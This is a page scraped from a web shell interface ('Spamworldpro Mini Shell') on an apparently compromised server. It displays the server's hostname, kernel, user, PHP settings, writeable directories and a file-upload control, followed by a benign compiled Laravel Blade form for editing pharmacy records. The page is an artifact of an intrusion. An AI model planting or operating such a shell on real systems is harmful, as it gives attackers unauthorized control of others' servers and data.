Spamworldpro Mini Shell
Spamworldpro


Server : Apache
System : Linux server2.corals.io 4.18.0-348.2.1.el8_5.x86_64 #1 SMP Mon Nov 15 09:17:08 EST 2021 x86_64
User : corals ( 1002)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/corals/syn.corals.io/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/corals/syn.corals.io/storage/framework/views/a50ced25c3fe4bf5833de8793d5150c84eeb72af.php
<?php $__env->startSection('content_header'); ?>
    <?php $__env->startComponent('components.content_header'); ?>
        <?php $__env->slot('page_title'); ?>
            <?php echo e($title_singular); ?>

        <?php $__env->endSlot(); ?>
        <?php $__env->slot('breadcrumb'); ?>
            <?php echo e(Breadcrumbs::render('syndicate_pharmacy_create_edit')); ?>

        <?php $__env->endSlot(); ?>
    <?php if (isset($__componentOriginal49aca921af2df6149c8fbbdc21f15941a7e3c98f)): ?>
<?php $component = $__componentOriginal49aca921af2df6149c8fbbdc21f15941a7e3c98f; ?>
<?php unset($__componentOriginal49aca921af2df6149c8fbbdc21f15941a7e3c98f); ?>
<?php endif; ?>
<?php echo $__env->renderComponent(); ?>
<?php $__env->stopSection(); ?>

<?php $__env->startSection('content'); ?>
    ##parent-placeholder-040f06fd774092478d450774f5ba30c5da78acc8##
    <div class="row ">
        <div class="col-md-8">
            <?php $__env->startComponent('components.box'); ?>
                <?php echo CoralsForm::openForm($pharmacy); ?>


                <?php echo CoralsForm::customFields($pharmacy); ?>



                <div class="row">
                    <div class="col-md-4">
                        <?php echo CoralsForm::text('name', 'Syndicate::attributes.pharmacy.name', true); ?>

                    </div>
                    <div class="col-md-4">
                        <?php echo CoralsForm::select("user_id",  'Syndicate::attributes.pharmacy.responsible_pharmacist' ,[], true,null,
                                                    [
                                                    'class'=>'select2-ajax',
                                                    'data'=>[
                                                           'model'=>\Corals\Modules\Syndicate\Models\Pharmacist::class,
                                                           'columns'=> json_encode(['name','email','last_name']),
                                                           'show_identifier'=>json_encode('true'),
                                                           'selected'=>json_encode([$pharmacy->user_id]),
                                                           ]
                                                    ], 'select2'); ?>

                    </div>
                    <div class="col-md-4">
                        <?php echo CoralsForm::date('opening_date', 'Syndicate::attributes.pharmacy.opening_date', true); ?>

                    </div>
                </div>

                <div class="row">
                    <div class="col-md-4">
                        <?php echo CoralsForm::text('street', 'Syndicate::attributes.pharmacy.street', true); ?>

                    </div>
                    <div class="col-md-4">
                        <?php echo CoralsForm::select('district_code','Syndicate::attributes.factory.district', ListOfValues::get('Syndicate::district', false, 'active', true), true, null, [
            'id'=>'district_code',

             'class'=>'dependent-select',
             'data'=>  [
                             'dependency-field'=>'city_code',
                             'dependency-ajax-url'=> url('utilities/get-district-type-children'),
                 ]
        ], 'select2'); ?>

                    </div>
                    <div class="col-md-4">
                        <?php echo CoralsForm::select('city_code','Syndicate::attributes.factory.city',[], false, null, ['code'=>'city_code','data-selected_value'=>$pharmacy->city_code], 'select2'); ?>

                    </div>
                </div>


                <div class="row">
                    <div class="col-md-4">
                        <?php echo CoralsForm::text('phone', 'Syndicate::attributes.pharmacy.phone', true); ?>

                    </div>
                    <div class="col-md-4">
                        <?php echo CoralsForm::text('mobile1', 'Syndicate::attributes.pharmacy.mobile1', false); ?>

                    </div>
                    <div class="col-md-4">
                        <?php echo CoralsForm::text('mobile2', 'Syndicate::attributes.pharmacy.mobile2', false); ?>

                    </div>
                </div>

                <div class="row">
                    <div class="col-md-4">
                        <?php echo CoralsForm::text('fax', 'Syndicate::attributes.pharmacy.fax', false); ?>

                    </div>
                    <div class="col-md-4">
                        <?php echo CoralsForm::text('email', 'Syndicate::attributes.pharmacy.email', false); ?>

                    </div>
                    <div class="col-md-4">
                        <?php echo CoralsForm::file('logo',  'Syndicate::attributes.pharmacy.logo' ); ?>


                        <img src="<?php echo e($pharmacy->logo); ?>" class="img-circle img-responsive" width="150"
                             alt="Logo Picture"/>

                        <?php if($pharmacy->exists && $pharmacy->getFirstMedia('logo-picture')): ?>
                            <?php echo CoralsForm::checkbox('clear',  'User::attributes.user.default_picture' ); ?>

                        <?php endif; ?>
                    </div>
                </div>
                <?php echo CoralsForm::formButtons(); ?>


                <?php echo CoralsForm::closeForm($pharmacy); ?>

            <?php if (isset($__componentOriginala4d84fb46be687bb4f86b193bc47a03d952a16b5)): ?>
<?php $component = $__componentOriginala4d84fb46be687bb4f86b193bc47a03d952a16b5; ?>
<?php unset($__componentOriginala4d84fb46be687bb4f86b193bc47a03d952a16b5); ?>
<?php endif; ?>
<?php echo $__env->renderComponent(); ?>
        </div>
    </div>
<?php $__env->stopSection(); ?>

<?php echo $__env->make('layouts.crud.create_edit', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?><?php /**PATH /home/corals/public_html/syn.corals.io/Corals/modules/Syndicate/resources/views/pharmacies/create_edit.blade.php ENDPATH**/ ?>

Spamworldpro Mini